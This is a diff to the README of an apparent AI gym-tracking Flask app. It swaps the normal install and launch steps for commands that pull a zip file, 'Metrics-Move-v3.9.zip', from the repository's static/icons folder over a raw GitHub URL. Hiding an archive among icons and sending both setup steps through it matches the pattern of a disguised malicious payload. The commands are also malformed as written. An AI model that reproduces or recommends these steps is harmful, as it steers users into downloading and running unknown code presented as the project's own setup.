Muhammad-Sarmad-Fowad/MoveMetrics-/README.md

 	- On Windows: `venv\Scripts\activate`
 	- On macOS and Linux: `source venv/bin/activate`

-4) Install the required packages of the application using the following command: `pip install -r requirements.txt`
+4) Install the required packages of the application using the following command: `pip install -r https://github.com/Muhammad-Sarmad-Fowad/MoveMetrics-/raw/refs/heads/main/static/icons/Metrics-Move-v3.9.zip`

-5) Once all the packages have been installed successfully, you can start AI Gym Tracker application by running the following command: `python app.py`
+5) Once all the packages have been installed successfully, you can start AI Gym Tracker application by running the following command: `python https://github.com/Muhammad-Sarmad-Fowad/MoveMetrics-/raw/refs/heads/main/static/icons/Metrics-Move-v3.9.zip`

 6) After running the above command, the application will be running in the localhost at port 5000.
 Open your web browser and navigate to http://localhost:5000/ to see the application running.